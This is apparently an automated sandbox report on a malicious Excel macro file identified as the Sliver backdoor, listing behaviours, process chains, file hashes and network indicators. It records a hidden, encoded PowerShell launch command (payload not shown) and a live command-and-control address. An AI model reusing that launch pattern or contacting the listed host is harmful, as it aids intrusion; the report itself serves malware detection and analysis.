Malware Analysis Report

2024-11-15 05:21

Sample ID 241110-1ptwcavqd1
Target f25f3770c942e387de418ecc50dd1ac49c713406c77d833d21f3603b54290750
SHA256 f25f3770c942e387de418ecc50dd1ac49c713406c77d833d21f3603b54290750
Tags
macro macro_on_action sliver backdoor discovery execution trojan
score
10/10

Analysis Overview

score
10/10

SHA256

f25f3770c942e387de418ecc50dd1ac49c713406c77d833d21f3603b54290750

Threat Level: Known bad

The file f25f3770c942e387de418ecc50dd1ac49c713406c77d833d21f3603b54290750 was found to be: Known bad.

Malicious Activity Summary

macro macro_on_action sliver backdoor discovery execution trojan

Process spawned unexpected child process

SliverRAT

Sliver family

Sliver RAT v2

Office macro that triggers on suspicious action

Command and Scripting Interpreter: PowerShell

Blocklisted process makes network request

System Location Discovery: System Language Discovery

Office loads VBA resources, possible macro or embedded object present

Suspicious use of SetWindowsHookEx

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Suspicious behavior: AddClipboardFormatListener

Enumerates system info in registry

Checks processor information in registry

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-10 21:49

Signatures

Office macro that triggers on suspicious action

macro macro_on_action
Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-10 21:49

Reported

2024-11-10 21:51

Platform

win7-20241023-en

Max time kernel

14s

Max time network

17s

Command Line

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\f25f3770c942e387de418ecc50dd1ac49c713406c77d833d21f3603b54290750.xls

Signatures

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE

Sliver RAT v2

Description Indicator Process Target
N/A N/A N/A N/A

Sliver family

sliver

SliverRAT

trojan backdoor sliver

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Office loads VBA resources, possible macro or embedded object present

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2156 wrote to memory of 2668 N/A C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2668 wrote to memory of 2840 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2840 wrote to memory of 2288 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe

Processes

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\f25f3770c942e387de418ecc50dd1ac49c713406c77d833d21f3603b54290750.xls

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -nop -w hidden -Enc

C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\mijvygvr.cmdline"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB78D.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCB78C.tmp"

Network

Country Destination Domain Proto
CH 194.182.164.149:8080 194.182.164.149 tcp

Files

\??\c:\Users\Admin\AppData\Local\Temp\mijvygvr.cmdline

MD5 6d5592b497b6e98a2d708b6ca0b2b03c
SHA1 bcaf6dd8a4ab750316b33c6844ab2dee9d11e028
SHA256 fb874493bd3bdd2f41a6b4a7a8a03635ac7af8566ce9122b3c52f459fa4144f9
SHA512 853db144173f793b2153ffc147d7b1d5664210c33c5457fc5cfd462a6d2a0d39c1faed305cc4392ea4abd0a61fe600715d884c7971148757c4025e2365b95167

\??\c:\Users\Admin\AppData\Local\Temp\mijvygvr.0.cs

MD5 f4dd5c682eb7b3b679f084261bfc7c4c
SHA1 70f75d7a4e42c185eb09139ed3c6f7338a2219c2
SHA256 2908bfece2edd241dc4f7cc26608c3254f7e5b896a38114618d56b65d4fc4319
SHA512 8f91148a6bd15f8182ef00b3e75b008eacda414852e8169112013377e4b9b88e1a0be73c8e0c212b8c0a51c24fbb2849c44d742f6019c9c5bf0dfb0e28a1b83d

\??\c:\Users\Admin\AppData\Local\Temp\CSCB78C.tmp

MD5 c47ff82a5932c232598a815a60178822
SHA1 9b8094368d382bbfdd9cbd7e20700fe3127f5893
SHA256 1282ea0e8dee8e7b23a7f6c321ffad1f00ab2b2dcb8b0065b0926d3351b5dcc3
SHA512 876da2690c0be06d5276822b8b9192ea9e79fff45a681f5a52fbbae973e10189fd6c4a6fcfc774345b47019edd1ac9d86058cacaec04607d0231a92661a5ea5d

C:\Users\Admin\AppData\Local\Temp\RESB78D.tmp

MD5 a6e93bded30f1d08d93ada9b9dcc635d
SHA1 70a19de7529fdd3890aa61593c3740e2a7de0c34
SHA256 80f77a12e822907f6fba5958b99cb5db08716db43a7623ef2b0340e81da18001
SHA512 38d4214b6c9271ab8e09a3c771049720bd2cf2279ff3c40aaa4b2f0564bb4c897dd8e48c1a2fb6b6028cfbbc1943735d82726ee14a4f407deb6c75d990626ab0

C:\Users\Admin\AppData\Local\Temp\mijvygvr.dll

MD5 67690e141a0648f29d9e43dcd5c1ea69
SHA1 28a1dbb751286185e24b85e5dfeaddd23a66c00a
SHA256 65190a9dcc89bd9f5ac6778ee2df1d9f94e29f4c254e59a55e4fa08589557c6b
SHA512 8b0bfb809d349042ebea31f6390a475eefd36e4c079358db65837f4ed0b438f70359229791a2062d3f92e4abf1c5eb5319f1aa6276fc4d3e33f1aaf1b2b17865

C:\Users\Admin\AppData\Local\Temp\mijvygvr.pdb

MD5 54b06d46d74260e0a2291dd86c9f10b3
SHA1 174fbcc8825cc334061e0206ae41da2dbbd25be3
SHA256 cd0d6d56c1a4579611ba20bbebc239572a45fa06e8ec065ae0752ac215b3a628
SHA512 21284050aedc9502a412384d89a21b540573b3767ab4143043312d91ed1733ca2c54c2b5c04aa40a1f019b2181f56d303936a6ced783355e226d22b5d57d7620

C:\Users\Admin\AppData\Local\Temp\CabC40C.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-10 21:49

Reported

2024-11-10 21:51

Platform

win10v2004-20241007-en

Max time kernel

57s

Max time network

60s

Command Line

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\f25f3770c942e387de418ecc50dd1ac49c713406c77d833d21f3603b54290750.xls"

Signatures

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

Sliver RAT v2

Description Indicator Process Target
N/A N/A N/A N/A

Sliver family

sliver

SliverRAT

trojan backdoor sliver

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\f25f3770c942e387de418ecc50dd1ac49c713406c77d833d21f3603b54290750.xls"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -nop -w hidden -Enc

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xpvmsg0o\xpvmsg0o.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES79C4.tmp" "c:\Users\Admin\AppData\Local\Temp\xpvmsg0o\CSC10AE9CB6BFF74E9F9A7E3E47CB7F897F.TMP"

Network

Country Destination Domain Proto
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 46.28.109.52.in-addr.arpa udp
US 8.8.8.8:53 roaming.officeapps.live.com udp
NL 52.109.89.19:443 roaming.officeapps.live.com tcp
US 8.8.8.8:53 19.89.109.52.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
CH 194.182.164.149:8080 194.182.164.149 tcp
US 8.8.8.8:53 71.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 149.164.182.194.in-addr.arpa udp
CH 194.182.164.149:443 tcp
CH 194.182.164.149:80 194.182.164.149 tcp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 24.73.42.20.in-addr.arpa udp
US 8.8.8.8:53 197.87.175.4.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3u3mv11f.e1c.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

\??\c:\Users\Admin\AppData\Local\Temp\xpvmsg0o\xpvmsg0o.0.cs

MD5 f4dd5c682eb7b3b679f084261bfc7c4c
SHA1 70f75d7a4e42c185eb09139ed3c6f7338a2219c2
SHA256 2908bfece2edd241dc4f7cc26608c3254f7e5b896a38114618d56b65d4fc4319
SHA512 8f91148a6bd15f8182ef00b3e75b008eacda414852e8169112013377e4b9b88e1a0be73c8e0c212b8c0a51c24fbb2849c44d742f6019c9c5bf0dfb0e28a1b83d

\??\c:\Users\Admin\AppData\Local\Temp\xpvmsg0o\xpvmsg0o.cmdline

MD5 c54b1847205e6289c4fad1c22fbbefe8
SHA1 58163628023bebaf23739ef66cdcc21f52dff0fe
SHA256 edb37127d3d01af43cc4c319f570bff7c684bee90c03b7d99150e4c63b7ef3cf
SHA512 5b016557261cecf6ee214b2a362c2c73627b9936233c82394d56d05d5bbb8025bf1b41780126be5f9835ebd249318212c4a87ca2ea8effaa12568c4e67e26cdf

\??\c:\Users\Admin\AppData\Local\Temp\xpvmsg0o\CSC10AE9CB6BFF74E9F9A7E3E47CB7F897F.TMP

MD5 458027e9cfdde1ffdac4e1387777fcf7
SHA1 cff3315ea3f37f8c461cfc198ad43f64e704567c
SHA256 c72c9893355ab3f80a6944088df41221f441884cfe8fef6e01485e2b7c3266b4
SHA512 8823b0e5a0ff9f528fd5d42c6a37f651ea267664cbe220c0c2baa6936477b5d193d1706d371173adab9e0c335ee68fd06dcb26aab38b5f4beb59c3d6481f499c

C:\Users\Admin\AppData\Local\Temp\RES79C4.tmp

MD5 7e0abd51747736297feda76c250d26d3
SHA1 d8fda7de6883d85f2cd1d844a3defb56a954c0df
SHA256 90a44cf74b8a3670e19e70f7df95eecd92073b37a3d41a2c8d7167865f1ecffa
SHA512 adb6a338c71968236db0cad8aab12ff6d459caf64d0ba50f56c34b5c1f09fb2c37c210aa520733675c1dbefdb76b56e9f81e77e6bb7815f091538916653d9da8

C:\Users\Admin\AppData\Local\Temp\xpvmsg0o\xpvmsg0o.dll

MD5 816da5b1a7277b7172992a4659047720
SHA1 a06ba4aa3c81f5fe92b75d377320fc4c672c6e5f
SHA256 71558b1fd2df5e7535a37740dc864738825db58a688693fabcd12a90298192a4
SHA512 4124175d416aeb126d1589d2900e76a7193b029cc12b15536cc95ef910f782a90c8dfa65dfd0486f3464f4c1aa01dd93096c1bf400ce6ce2bd4da998ed4a80bb

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms

MD5 05e79935dc65b602002c4c27f265e96d
SHA1 c40e8392e84405bf8cc64beb0afc0bce95c02143
SHA256 405411e2fe9298412c0e211bf38cd51f3686c379d2262f04b2be5697cf30b877
SHA512 08b52937cb368759ff1669f7e8476882083fd34f04143916b99411eb11c1e04a687fd49752c26b48d6d3dc41e0461b47d6182ee7e2d7e69515aaf7a61c095704
